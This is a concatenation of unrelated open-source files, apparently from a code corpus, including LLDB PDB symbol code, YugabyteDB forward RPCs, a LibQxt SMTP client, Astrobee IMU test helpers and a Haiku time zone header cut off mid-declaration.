PdbSymUid uid(type_uid);
lldbassert(uid.kind() == PdbSymUidKind::Type);
PdbTypeSymId type_id = uid.asTypeSym();
if (type_id.index.isNoneType())
return nullptr;
TypeSP type_sp = CreateAndCacheType(type_id);
return &*type_sp;
}
llvm::Optional<SymbolFile::ArrayInfo>
SymbolFileNativePDB::GetDynamicArrayInfoForUID(
lldb::user_id_t type_uid, const lldb_private::ExecutionContext *exe_ctx) {
return llvm::None;
}
bool SymbolFileNativePDB::CompleteType(CompilerType &compiler_type) {
clang::QualType qt =
clang::QualType::getFromOpaquePtr(compiler_type.GetOpaqueQualType());
return m_ast->CompleteType(qt);
}
void SymbolFileNativePDB::GetTypes(lldb_private::SymbolContextScope *sc_scope,
TypeClass type_mask,
lldb_private::TypeList &type_list) {}
CompilerDeclContext
SymbolFileNativePDB::FindNamespace(ConstString name,
const CompilerDeclContext &parent_decl_ctx) {
return {};
}
llvm::Expected<TypeSystem &>
SymbolFileNativePDB::GetTypeSystemForLanguage(lldb::LanguageType language) {
auto type_system_or_err =
m_objfile_sp->GetModule()->GetTypeSystemForLanguage(language);
if (type_system_or_err) {
type_system_or_err->SetSymbolFile(this);
}
return type_system_or_err;
}
ConstString SymbolFileNativePDB::GetPluginName() {
static ConstString g_name("pdb");
return g_name;
}
uint32_t SymbolFileNativePDB::GetPluginVersion() { return 1; }
| 22,248 |
1,555 | extern void exit (int);
struct a
{
unsigned int bitfield : 3;
};
int main()
{
struct a a;
a.bitfield = 131;
foo (a.bitfield);
exit (0);
}
foo(unsigned int z)
{
if (z != 3)
abort ();
}
| 89 |
3,702 | <reponame>impira/yugabyte-db
// Copyright (c) YugaByte, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software distributed under the License
// is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
// or implied. See the License for the specific language governing permissions and limitations
// under the License.
//
#include "yb/client/client.h"
#include "yb/client/client_error.h"
#include "yb/client/client-internal.h"
#include "yb/client/forward_rpc.h"
#include "yb/client/meta_cache.h"
#include "yb/client/table.h"
#include "yb/client/yb_op.h"
#include "yb/common/pgsql_error.h"
#include "yb/common/transaction_error.h"
#include "yb/common/wire_protocol.h"
#include "yb/util/cast.h"
#include "yb/util/debug-util.h"
#include "yb/util/logging.h"
#include "yb/util/yb_pg_errcodes.h"
using namespace std::placeholders;
DECLARE_bool(rpc_dump_all_traces);
DECLARE_bool(collect_end_to_end_traces);
namespace yb {
using std::shared_ptr;
using std::string;
using rpc::Rpc;
using tserver::WriteRequestPB;
using tserver::WriteResponsePB;
using tserver::ReadRequestPB;
using tserver::ReadResponsePB;
using tserver::TabletServerErrorPB;
namespace client {
namespace internal {
static CoarseTimePoint ComputeDeadline() {
// TODO(Sudheer) : Make sure we pass the deadline from the PGGate layer and use that here.
MonoDelta timeout = MonoDelta::FromSeconds(60);
return CoarseMonoClock::now() + timeout;
}
template <class Req, class Resp>
ForwardRpc<Req, Resp>::ForwardRpc(const Req *req, Resp *res,
rpc::RpcContext&& context,
YBConsistencyLevel consistency_level,
YBClient *client)
: Rpc(ComputeDeadline(), client->messenger(), &client->proxy_cache()),
req_(req),
res_(res),
context_(std::move(context)),
trace_(new Trace),
start_(MonoTime::Now()),
tablet_invoker_(false /* local_tserver_only */,
consistency_level,
client,
this,
this,
nullptr /* tablet */,
nullptr /* table */,
mutable_retrier(),
trace_.get()) {
}
template <class Req, class Resp>
ForwardRpc<Req, Resp>::~ForwardRpc() {
if (PREDICT_FALSE(FLAGS_rpc_dump_all_traces)) {
LOG(INFO) << ToString() << " took "
<< MonoTime::Now().GetDeltaSince(start_).ToMicroseconds()
<< "us. Trace:";
trace_->Dump(&LOG(INFO), true);
}
}
template <class Req, class Resp>
string ForwardRpc<Req, Resp>::ToString() const {
return Format("$0(tablet: $1, num_attempts: $2)",
read_only() ? "Read" : "Write",
req_->tablet_id(),
num_attempts());
}
template <class Req, class Resp>
void ForwardRpc<Req, Resp>::SendRpc() {
TRACE_TO(trace_, "SendRpc() called.");
retained_self_ = shared_from_this();
tablet_invoker_.Execute(req_->tablet_id(), num_attempts() > 1);
}
template <class Req, class Resp>
void ForwardRpc<Req, Resp>::Finished(const Status& status) {
Status new_status = status;
if (tablet_invoker_.Done(&new_status)) {
if (new_status.ok()) {
PopulateResponse();
}
context_.RespondSuccess();
retained_self_.reset();
}
}
template <class Req, class Resp>
void ForwardRpc<Req, Resp>::Failed(const Status& status) {
TabletServerErrorPB *err = res_->mutable_error();
StatusToPB(status, err->mutable_status());
}
ForwardWriteRpc::ForwardWriteRpc(const WriteRequestPB *req,
WriteResponsePB *res,
rpc::RpcContext&& context,
YBClient *client) :
ForwardRpc(req, res, std::move(context), YBConsistencyLevel::STRONG, client) {
// Ensure that only PGSQL operations are forwarded.
DCHECK(!req->redis_write_batch_size() && !req->ql_write_batch_size());
}
ForwardWriteRpc::~ForwardWriteRpc() {
}
void ForwardWriteRpc::SendRpcToTserver(int attempt_num) {
auto trace = trace_;
TRACE_TO(trace, "SendRpcToTserver");
ADOPT_TRACE(trace.get());
tablet_invoker_.proxy()->WriteAsync(
*req_, res_, PrepareController(),
std::bind(&ForwardWriteRpc::Finished, this, Status::OK()));
TRACE_TO(trace, "RpcDispatched Asynchronously");
}
void ForwardWriteRpc::PopulateResponse() {
for (const auto& r : res_->pgsql_response_batch()) {
if (r.has_rows_data_sidecar()) {
Slice s = CHECK_RESULT(retrier().controller().GetSidecar(r.rows_data_sidecar()));
context_.AddRpcSidecar(s);
}
}
}
ForwardReadRpc::ForwardReadRpc(const ReadRequestPB *req,
ReadResponsePB *res,
rpc::RpcContext&& context,
YBClient *client) :
ForwardRpc(req, res, std::move(context), req->consistency_level(), client) {
// Ensure that only PGSQL operations are forwarded.
DCHECK(!req->redis_batch_size() && !req->ql_batch_size());
}
ForwardReadRpc::~ForwardReadRpc() {
}
void ForwardReadRpc::SendRpcToTserver(int attempt_num) {
auto trace = trace_;
TRACE_TO(trace, "SendRpcToTserver");
ADOPT_TRACE(trace.get());
tablet_invoker_.proxy()->ReadAsync(
*req_, res_, PrepareController(),
std::bind(&ForwardReadRpc::Finished, this, Status::OK()));
TRACE_TO(trace, "RpcDispatched Asynchronously");
}
void ForwardReadRpc::PopulateResponse() {
for (const auto& r : res_->pgsql_batch()) {
if (r.has_rows_data_sidecar()) {
Slice s = CHECK_RESULT(retrier().controller().GetSidecar(r.rows_data_sidecar()));
context_.AddRpcSidecar(s);
}
}
}
} // namespace internal
} // namespace client
} // namespace yb
| 2,528 |
425 | {"Sections":[{"Errors":[],"SectionType":"entitySection","Id":"entitySection_product","Body":"","Name":"product","Type":"simple","SynonymsOrPhraseList":[],"Range":{"Start":{"Line":3,"Character":0},"End":{"Line":3,"Character":17}}},{"Errors":[],"SectionType":"entitySection","Id":"entitySection_PREBUILT","Body":"","Name":"PREBUILT","Type":"number","SynonymsOrPhraseList":[],"Range":{"Start":{"Line":5,"Character":0},"End":{"Line":5,"Character":18}}},{"Errors":[],"SectionType":"entitySection","Id":"entitySection_drinks","Body":"","Name":"drinks","Type":"phraseList","SynonymsOrPhraseList":["tea, latte, milk"],"Range":{"Start":{"Line":7,"Character":0},"End":{"Line":8,"Character":23}}},{"Errors":[],"SectionType":"entitySection","Id":"entitySection_product","Body":"","Name":"product","Type":"phraseList","SynonymsOrPhraseList":["a, b, c"],"Range":{"Start":{"Line":10,"Character":0},"End":{"Line":11,"Character":14}}},{"Errors":[],"SectionType":"entitySection","Id":"entitySection_EspressoType","Body":"","Name":"EspressoType","Type":"Blonde ::201=","SynonymsOrPhraseList":["blonde","blond"],"Range":{"Start":{"Line":12,"Character":0},"End":{"Line":14,"Character":12}}}],"Content":"\n\n$product : simple\n\n$PREBUILT : number\n\n$drinks:phraseList\n - tea, latte, milk\n\n$product:phraseList\n - a, b, c\n$EspressoType:Blonde ::201=\n - blonde\n - blond\n","Errors":[]} | 429 |
335 | {
"word": "Labyrinthodont",
"definitions": [
"(of teeth) having the enamel deeply folded to form a labyrinthine structure.",
"Relating to a group of large fossil amphibians of the late Devonian to early Triassic periods having labyrinthodont teeth."
],
"parts-of-speech": "Adjective"
} | 106 |
629 | /* Copyright (c) 2017, United States Government, as represented by the
* Administrator of the National Aeronautics and Space Administration.
*
* All rights reserved.
*
* The Astrobee platform is licensed under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with the
* License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
#include "test_utilities.h" // NOLINT
#include <localization_common/logger.h>
#include <localization_common/utilities.h>
#include <msg_conversions/msg_conversions.h>
namespace imu_augmentor {
namespace lc = localization_common;
namespace lm = localization_measurements;
namespace mc = msg_conversions;
ImuAugmentorParams DefaultImuAugmentorParams() {
ImuAugmentorParams params;
params.gravity = gtsam::Vector3::Zero();
params.body_T_imu = gtsam::Pose3::identity();
// Filer params are already default none
params.filter = imu_integration::ImuFilterParams();
params.gyro_sigma = 0.1;
params.accel_sigma = 0.1;
params.accel_bias_sigma = 0.1;
params.gyro_bias_sigma = 0.1;
params.integration_variance = 0.1;
params.bias_acc_omega_int = 0.1;
params.standstill_enabled = true;
return params;
}
std::vector<lm::ImuMeasurement> ConstantMeasurements(const Eigen::Vector3d& acceleration,
const Eigen::Vector3d& angular_velocity,
const int num_measurements, const lc::Time start_time,
const double time_increment) {
std::vector<lm::ImuMeasurement> imu_measurements;
for (int i = 0; i < num_measurements; ++i) {
const lc::Time time = start_time + i * time_increment;
imu_measurements.emplace_back(lm::ImuMeasurement(acceleration, angular_velocity, time));
}
return imu_measurements;
}
std::vector<lm::ImuMeasurement> ConstantAccelerationMeasurements(const Eigen::Vector3d& acceleration,
const int num_measurements, const lc::Time start_time,
const double time_increment) {
const Eigen::Vector3d zero_angular_velocity(Eigen::Vector3d::Zero());
return ConstantMeasurements(acceleration, zero_angular_velocity, num_measurements, start_time, time_increment);
}
std::vector<lm::ImuMeasurement> ConstantAngularVelocityMeasurements(const Eigen::Vector3d& angular_velocity,
const int num_measurements,
const lc::Time start_time,
const double time_increment) {
const Eigen::Vector3d zero_acceleration(Eigen::Vector3d::Zero());
return ConstantMeasurements(zero_acceleration, angular_velocity, num_measurements, start_time, time_increment);
}
gtsam::Rot3 IntegrateAngularVelocities(const std::vector<localization_measurements::ImuMeasurement>& imu_measurements,
const gtsam::Rot3& starting_orientation,
const localization_common::Time starting_time) {
gtsam::Rot3 integrated_orientation = starting_orientation;
lc::Time integrated_time = starting_time;
for (const auto& imu_measurement : imu_measurements) {
if (imu_measurement.timestamp <= integrated_time) continue;
const double dt = imu_measurement.timestamp - integrated_time;
integrated_time = imu_measurement.timestamp;
// TODO(rsoussan): subtract ang vel bias first!! add this as param!!
const gtsam::Rot3 orientation_update = gtsam::Rot3::Expmap(imu_measurement.angular_velocity * dt);
integrated_orientation = integrated_orientation * orientation_update;
}
return integrated_orientation;
}
sensor_msgs::Imu ImuMsg(const localization_measurements::ImuMeasurement& imu_measurement) {
sensor_msgs::Imu imu_msg;
msg_conversions::VectorToMsg(imu_measurement.acceleration, imu_msg.linear_acceleration);
msg_conversions::VectorToMsg(imu_measurement.angular_velocity, imu_msg.angular_velocity);
lc::TimeToHeader(imu_measurement.timestamp, imu_msg.header);
return imu_msg;
}
} // namespace imu_augmentor
| 1,922 |
302 |
/****************************************************************************
** Copyright (c) 2006 - 2011, the LibQxt project.
** See the Qxt AUTHORS file for a list of authors and copyright holders.
** All rights reserved.
**
** Redistribution and use in source and binary forms, with or without
** modification, are permitted provided that the following conditions are met:
** * Redistributions of source code must retain the above copyright
** notice, this list of conditions and the following disclaimer.
** * Redistributions in binary form must reproduce the above copyright
** notice, this list of conditions and the following disclaimer in the
** documentation and/or other materials provided with the distribution.
** * Neither the name of the LibQxt project nor the
** names of its contributors may be used to endorse or promote products
** derived from this software without specific prior written permission.
**
** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
** ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
** WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
** DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
** DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
** (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
** LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
** ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
** (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
** SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**
** <http://libqxt.org> <<EMAIL>>
*****************************************************************************/
/*!
* \class QxtSmtp
* \inmodule QxtNetwork
* \brief The QxtSmtp class implements the SMTP protocol for sending email
*/
#include "mailsmtp.h"
#include "mailsmtp_p.h"
#include "mailhmac.h"
#include <QStringList>
#include <QTcpSocket>
#include <QNetworkInterface>
#ifndef QT_NO_OPENSSL
# include <QSslSocket>
#endif
QxtSmtpPrivate::QxtSmtpPrivate(QxtSmtp *q)
: QObject(0), q_ptr(q)
, allowedAuthTypes(QxtSmtp::AuthPlain | QxtSmtp::AuthLogin | QxtSmtp::AuthCramMD5)
{
// empty ctor
}
QxtSmtp::QxtSmtp(QObject* parent)
: QObject(parent), d_ptr(new QxtSmtpPrivate(this))
{
d_ptr->state = QxtSmtpPrivate::Disconnected;
d_ptr->nextID = 0;
#ifndef QT_NO_OPENSSL
d_ptr->socket = new QSslSocket(this);
QObject::connect(socket(), SIGNAL(encrypted()), this, SIGNAL(encrypted()));
//QObject::connect(socket(), SIGNAL(encrypted()), &qxt_d(), SLOT(ehlo()));
#else
d_func()->socket = new QTcpSocket(this);
#endif
QObject::connect(socket(), SIGNAL(connected()), this, SIGNAL(connected()));
QObject::connect(socket(), SIGNAL(disconnected()), this, SIGNAL(disconnected()));
QObject::connect(socket(), SIGNAL(error(QAbstractSocket::SocketError)), d_func(), SLOT(socketError(QAbstractSocket::SocketError)));
QObject::connect(this, SIGNAL(authenticated()), d_func(), SLOT(sendNext()));
QObject::connect(socket(), SIGNAL(readyRead()), d_func(), SLOT(socketRead()));
}
/*!
* Destroy the object.
*/
QxtSmtp::~QxtSmtp()
{
}
QByteArray QxtSmtp::username() const
{
return d_func()->username;
}
void QxtSmtp::setUsername(const QByteArray& username)
{
d_func()->username = username;
}
QByteArray QxtSmtp::password() const
{
return d_func()->password;
}
void QxtSmtp::setPassword(const QByteArray& password)
{
d_func()->password = password;
}
int QxtSmtp::send(const QxtMailMessage& message)
{
int messageID = ++d_func()->nextID;
d_func()->pending.append(qMakePair(messageID, message));
if (d_func()->state == QxtSmtpPrivate::Waiting)
d_func()->sendNext();
return messageID;
}
int QxtSmtp::pendingMessages() const
{
return d_func()->pending.count();
}
QTcpSocket* QxtSmtp::socket() const
{
return d_func()->socket;
}
void QxtSmtp::connectToHost(const QString& hostName, quint16 port)
{
d_func()->useSecure = false;
d_func()->state = QxtSmtpPrivate::StartState;
socket()->connectToHost(hostName, port);
}
void QxtSmtp::connectToHost(const QHostAddress& address, quint16 port)
{
connectToHost(address.toString(), port);
}
void QxtSmtp::disconnectFromHost()
{
socket()->disconnectFromHost();
}
bool QxtSmtp::startTlsDisabled() const
{
return d_func()->disableStartTLS;
}
void QxtSmtp::setStartTlsDisabled(bool disable)
{
d_func()->disableStartTLS = disable;
}
#ifndef QT_NO_OPENSSL
QSslSocket* QxtSmtp::sslSocket() const
{
return d_func()->socket;
}
void QxtSmtp::connectToSecureHost(const QString& hostName, quint16 port)
{
d_func()->useSecure = true;
d_func()->state = QxtSmtpPrivate::StartState;
sslSocket()->connectToHostEncrypted(hostName, port);
}
void QxtSmtp::connectToSecureHost(const QHostAddress& address, quint16 port)
{
connectToSecureHost(address.toString(), port);
}
#endif
bool QxtSmtp::hasExtension(const QString& extension)
{
return d_func()->extensions.contains(extension);
}
QString QxtSmtp::extensionData(const QString& extension)
{
return d_func()->extensions[extension];
}
bool QxtSmtp::isAuthMethodEnabled(AuthType type) const
{
return d_func()->allowedAuthTypes & type;
}
void QxtSmtp::setAuthMethodEnabled(AuthType type, bool enable)
{
if(enable)
d_func()->allowedAuthTypes |= type;
else
d_func()->allowedAuthTypes &= ~type;
}
void QxtSmtpPrivate::socketError(QAbstractSocket::SocketError err)
{
if (err == QAbstractSocket::SslHandshakeFailedError)
{
emit q_func()->encryptionFailed();
emit q_func()->encryptionFailed( socket->errorString().toLatin1() );
}
else if (state == StartState)
{
emit q_func()->connectionFailed();
emit q_func()->connectionFailed( socket->errorString().toLatin1() );
}
}
void QxtSmtpPrivate::socketRead()
{
buffer += socket->readAll();
while (true)
{
int pos = buffer.indexOf("\r\n");
if (pos < 0) return;
QByteArray line = buffer.left(pos);
buffer = buffer.mid(pos + 2);
QByteArray code = line.left(3);
switch (state)
{
case StartState:
if (code[0] != '2')
{
state = Disconnected;
emit q_func()->connectionFailed();
emit q_func()->connectionFailed(line);
socket->disconnectFromHost();
}
else
{
ehlo();
}
break;
case HeloSent:
case EhloSent:
case EhloGreetReceived:
parseEhlo(code, (line[3] != ' '), QString::fromLatin1(line.mid(4)));
break;
#ifndef QT_NO_OPENSSL
case StartTLSSent:
if (code == "220")
{
socket->startClientEncryption();
ehlo();
}
else
{
authenticate();
}
break;
#endif
case AuthRequestSent:
case AuthUsernameSent:
if (authType == QxtSmtp::AuthPlain) authPlain();
else if (authType == QxtSmtp::AuthLogin) authLogin();
else authCramMD5(line.mid(4));
break;
case AuthSent:
if (code[0] == '2')
{
state = Authenticated;
emit q_func()->authenticated();
}
else
{
state = Disconnected;
emit q_func()->authenticationFailed();
emit q_func()->authenticationFailed( line );
socket->disconnectFromHost();
}
break;
case MailToSent:
case RcptAckPending:
if (code[0] != '2') {
emit q_func()->mailFailed( pending.first().first, code.toInt() );
emit q_func()->mailFailed(pending.first().first, code.toInt(), line);
// pending.removeFirst();
// DO NOT remove it, the body sent state needs this message to assigned the next mail failed message that will
// the sendNext
// a reset will be sent to clear things out
sendNext();
state = BodySent;
}
else
sendNextRcpt(code, line);
break;
case SendingBody:
sendBody(code, line);
break;
case BodySent:
if ( pending.count() )
{
// if you removeFirst in RcpActpending/MailToSent on an error, and the queue is now empty,
// you will get into this state and then crash because no check is done. CHeck added but shouldnt
// be necessary since I commented out the removeFirst
if (code[0] != '2')
{
emit q_func()->mailFailed(pending.first().first, code.toInt() );
emit q_func()->mailFailed(pending.first().first, code.toInt(), line);
}
else
emit q_func()->mailSent(pending.first().first);
pending.removeFirst();
}
sendNext();
break;
case Resetting:
if (code[0] != '2') {
emit q_func()->connectionFailed();
emit q_func()->connectionFailed( line );
}
else {
state = Waiting;
sendNext();
}
break;
default:
// Do nothing.
break;
}
}
}
void QxtSmtpPrivate::ehlo()
{
QByteArray address = "127.0.0.1";
foreach(const QHostAddress& addr, QNetworkInterface::allAddresses())
{
if (addr == QHostAddress::LocalHost || addr == QHostAddress::LocalHostIPv6)
continue;
address = addr.toString().toLatin1();
break;
}
socket->write("ehlo " + address + "\r\n");
extensions.clear();
state = EhloSent;
}
void QxtSmtpPrivate::parseEhlo(const QByteArray& code, bool cont, const QString& line)
{
if (code != "250")
{
// error!
if (state != HeloSent)
{
// maybe let's try HELO
socket->write("helo\r\n");
state = HeloSent;
}
else
{
// nope
socket->write("QUIT\r\n");
socket->flush();
socket->disconnectFromHost();
}
return;
}
else if (state != EhloGreetReceived)
{
if (!cont)
{
// greeting only, no extensions
state = EhloDone;
}
else
{
// greeting followed by extensions
state = EhloGreetReceived;
return;
}
}
else
{
extensions[line.section(' ', 0, 0).toUpper()] = line.section(' ', 1);
if (!cont)
state = EhloDone;
}
if (state != EhloDone) return;
if (extensions.contains(QStringLiteral("STARTTLS")) && !disableStartTLS)
{
startTLS();
}
else
{
authenticate();
}
}
void QxtSmtpPrivate::startTLS()
{
#ifndef QT_NO_OPENSSL
socket->write("starttls\r\n");
state = StartTLSSent;
#else
authenticate();
#endif
}
void QxtSmtpPrivate::authenticate()
{
if (!extensions.contains(QStringLiteral("AUTH")) || username.isEmpty() || password.isEmpty())
{
state = Authenticated;
emit q_func()->authenticated();
}
else
{
QStringList auth = extensions[QStringLiteral("AUTH")].toUpper().split(' ', QString::SkipEmptyParts);
if (auth.contains(QStringLiteral("CRAM-MD5")) && (allowedAuthTypes & QxtSmtp::AuthCramMD5))
{
authCramMD5();
}
else if (auth.contains(QStringLiteral("PLAIN")) && (allowedAuthTypes & QxtSmtp::AuthPlain))
{
authPlain();
}
else if (auth.contains(QStringLiteral("LOGIN")) && (allowedAuthTypes & QxtSmtp::AuthLogin))
{
authLogin();
}
else
{
state = Authenticated;
emit q_func()->authenticated();
}
}
}
void QxtSmtpPrivate::authCramMD5(const QByteArray& challenge)
{
if (state != AuthRequestSent)
{
socket->write("auth cram-md5\r\n");
authType = QxtSmtp::AuthCramMD5;
state = AuthRequestSent;
}
else
{
QxtHmac hmac(QCryptographicHash::Md5);
hmac.setKey(password);
hmac.addData(QByteArray::fromBase64(challenge));
QByteArray response = username + ' ' + hmac.result().toHex();
socket->write(response.toBase64() + "\r\n");
state = AuthSent;
}
}
void QxtSmtpPrivate::authPlain()
{
if (state != AuthRequestSent)
{
socket->write("auth plain\r\n");
authType = QxtSmtp::AuthPlain;
state = AuthRequestSent;
}
else
{
QByteArray auth;
auth += '\0';
auth += username;
auth += '\0';
auth += password;
socket->write(auth.toBase64() + "\r\n");
state = AuthSent;
}
}
void QxtSmtpPrivate::authLogin()
{
if (state != AuthRequestSent && state != AuthUsernameSent)
{
socket->write("auth login\r\n");
authType = QxtSmtp::AuthLogin;
state = AuthRequestSent;
}
else if (state == AuthRequestSent)
{
socket->write(username.toBase64() + "\r\n");
state = AuthUsernameSent;
}
else
{
socket->write(password.toBase64() + "\r\n");
state = AuthSent;
}
}
static QByteArray qxt_extract_address(const QString& address)
{
int parenDepth = 0;
int addrStart = -1;
bool inQuote = false;
int ct = address.length();
for (int i = 0; i < ct; i++)
{
QChar ch = address[i];
if (inQuote)
{
if (ch == '"')
inQuote = false;
}
else if (addrStart != -1)
{
if (ch == '>')
return address.mid(addrStart, (i - addrStart)).toLatin1();
}
else if (ch == '(')
{
parenDepth++;
}
else if (ch == ')')
{
parenDepth--;
if (parenDepth < 0) parenDepth = 0;
}
else if (ch == '"')
{
if (parenDepth == 0)
inQuote = true;
}
else if (ch == '<')
{
if (!inQuote && parenDepth == 0)
addrStart = i + 1;
}
}
return address.toLatin1();
}
void QxtSmtpPrivate::sendNext()
{
if (state == Disconnected)
{
// leave the mail in the queue if not ready to send
return;
}
if (pending.isEmpty())
{
// if there are no additional mails to send, finish up
state = Waiting;
emit q_func()->finished();
return;
}
if(state != Waiting) {
state = Resetting;
socket->write("rset\r\n");
return;
}
const QxtMailMessage& msg = pending.first().second;
rcptNumber = rcptAck = mailAck = 0;
recipients = msg.recipients(QxtMailMessage::To) +
msg.recipients(QxtMailMessage::Cc) +
msg.recipients(QxtMailMessage::Bcc);
if (recipients.count() == 0)
{
// can't send an e-mail with no recipients
emit q_func()->mailFailed(pending.first().first, QxtSmtp::NoRecipients );
emit q_func()->mailFailed(pending.first().first, QxtSmtp::NoRecipients, QByteArray( "e-mail has no recipients" ) );
pending.removeFirst();
sendNext();
return;
}
// We explicitly use lowercase keywords because for some reason gmail
// interprets any string starting with an uppercase R as a request
// to renegotiate the SSL connection.
socket->write("mail from:<" + qxt_extract_address(msg.sender()) + ">\r\n");
if (extensions.contains(QStringLiteral("PIPELINING"))) // almost all do nowadays
{
foreach(const QString& rcpt, recipients)
{
socket->write("rcpt to:<" + qxt_extract_address(rcpt) + ">\r\n");
}
state = RcptAckPending;
}
else
{
state = MailToSent;
}
}
void QxtSmtpPrivate::sendNextRcpt(const QByteArray& code, const QByteArray&line)
{
int messageID = pending.first().first;
const QxtMailMessage& msg = pending.first().second;
if (code[0] != '2')
{
// on failure, emit a warning signal
if (!mailAck)
{
emit q_func()->senderRejected(messageID, msg.sender());
emit q_func()->senderRejected(messageID, msg.sender(), line );
}
else
{
emit q_func()->recipientRejected(messageID, msg.sender());
emit q_func()->recipientRejected(messageID, msg.sender(), line);
}
}
else if (!mailAck)
{
mailAck = true;
}
else
{
rcptAck++;
}
if (rcptNumber == recipients.count())
{
// all recipients have been sent
if (rcptAck == 0)
{
// no recipients were considered valid
emit q_func()->mailFailed(messageID, code.toInt() );
emit q_func()->mailFailed(messageID, code.toInt(), line);
pending.removeFirst();
sendNext();
}
else
{
// at least one recipient was acknowledged, send mail body
socket->write("data\r\n");
state = SendingBody;
}
}
else if (state != RcptAckPending)
{
// send the next recipient unless we're only waiting on acks
socket->write("rcpt to:<" + qxt_extract_address(recipients[rcptNumber]) + ">\r\n");
rcptNumber++;
}
else
{
// If we're only waiting on acks, just count them
rcptNumber++;
}
}
void QxtSmtpPrivate::sendBody(const QByteArray& code, const QByteArray & line)
{
int messageID = pending.first().first;
const QxtMailMessage& msg = pending.first().second;
if (code[0] != '3')
{
emit q_func()->mailFailed(messageID, code.toInt() );
emit q_func()->mailFailed(messageID, code.toInt(), line);
pending.removeFirst();
sendNext();
return;
}
socket->write(msg.rfc2822());
socket->write(".\r\n");
state = BodySent;
}
| 8,347 |
677 | // Copyright 2017 The Lynx Authors. All rights reserved.
package com.lynx.ui.swiper;
import android.util.SparseArray;
import com.lynx.core.impl.RenderObjectImpl;
import com.lynx.ui.LynxUI;
import java.util.ArrayList;
import java.util.List;
public class PagerRecyclerBin {
private SparseArray<List<LynxUI>> mRecycledUIBin;
private boolean enableRecycle = false;
public PagerRecyclerBin() {
mRecycledUIBin = new SparseArray<>();
}
/**
* 获取被回收的view,可以进行重复使用
* @param type
* @return
*/
public LynxUI getRecycledUI(int type) {
List<LynxUI> list = mRecycledUIBin.get(type);
if (list != null && list.size() > 0) {
return list.remove(0);
}
return null;
}
public void recycleUI(RenderObjectImpl impl) {
if (!enableRecycle) {
return;
}
LynxUI ui = impl.getUI();
if (ui == null) {
return;
}
for (int i = 0; i < impl.getChildCount(); i++) {
ui.removeChild(impl.getChildAt(i));
recycleUI(impl.getChildAt(i));
}
// firstly get view's type
int type = impl.getRenderObjectType();
// unbind data from view
ui.unbindData();
// add the view to pool
List<LynxUI> list = mRecycledUIBin.get(type);
if (list == null) {
list = new ArrayList<>();
mRecycledUIBin.put(type, list);
}
list.add(ui);
mRecycledUIBin.put(type, list);
}
public void enableRecycle(boolean enable) {
enableRecycle = enable;
}
public void clear() {
mRecycledUIBin.clear();
}
}
| 827 |
399 | <reponame>tzpBingo/IQL
package iql.web.config;
import org.springframework.boot.web.servlet.MultipartConfigFactory;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.annotation.Order;
import org.springframework.web.multipart.commons.CommonsMultipartResolver;
import org.springframework.web.multipart.support.MultipartFilter;
import javax.servlet.MultipartConfigElement;
@Configuration
public class MCFileUploadConfigurer {
// @Bean
// public MultipartConfigElement multipartConfigElement() {
// MultipartConfigFactory factory = new MultipartConfigFactory();
// // 设置文件大小限制 ,超出设置页面会抛出异常信息,
// // 这样在文件上传的地方就需要进行异常信息的处理了;
// factory.setMaxFileSize("100MB"); // KB,MB
// /// 设置总上传数据总大小
// factory.setMaxRequestSize("512MB");
// // 文件保存路径
// // factory.setLocation("路径地址");
// return factory.createMultipartConfig();
// }
//
// @Bean
// public CommonsMultipartResolver multipartResolver() {
// CommonsMultipartResolver multipart = new CommonsMultipartResolver();
// multipart.setMaxUploadSize(100 * 1024 * 1024);
// return multipart;
// }
//
// @Bean
// @Order(0)
// public MultipartFilter multipartFilter() {
// MultipartFilter multipartFilter = new MultipartFilter();
// multipartFilter.setMultipartResolverBeanName("multipartResolver");
// return multipartFilter;
// }
}
| 680 |
1,338 | /*
* Copyright 2004-2012, Haiku, Inc. All Rights Reserved.
* Distributed under the terms of the MIT License.
*
* Authors:
* <NAME> <<EMAIL>>
* Julun <<EMAIL>>
* <NAME> <<EMAIL>>
*/
#ifndef ZONE_VIEW_H
#define ZONE_VIEW_H
#include <LayoutBuilder.h>
#include <TimeFormat.h>
#include <TimeZone.h>
class BButton;
class BMessage;
class BOutlineListView;
class BPopUpMenu;
class BRadioButton;
class BTimeZone;
class TimeZoneListItem;
class TimeZoneListView;
class TTZDisplay;
class TimeZoneView : public BGroupView {
public:
TimeZoneView(const char* name);
virtual ~TimeZoneView();
virtual void AttachedToWindow();
virtual void MessageReceived(BMessage* message);
bool CheckCanRevert();
protected:
virtual void DoLayout();
private:
void _UpdateDateTime(BMessage* message);
void _SetSystemTimeZone();
void _UpdatePreview();
void _UpdateCurrent();
BString _FormatTime(const BTimeZone& timeZone);
void _ReadRTCSettings();
void _WriteRTCSettings();
void _UpdateGmtSettings();
void _ShowOrHidePreview();
void _InitView();
void _BuildZoneMenu();
void _Revert();
TimeZoneListView* fZoneList;
BButton* fSetZone;
TTZDisplay* fCurrent;
TTZDisplay* fPreview;
BRadioButton* fLocalTime;
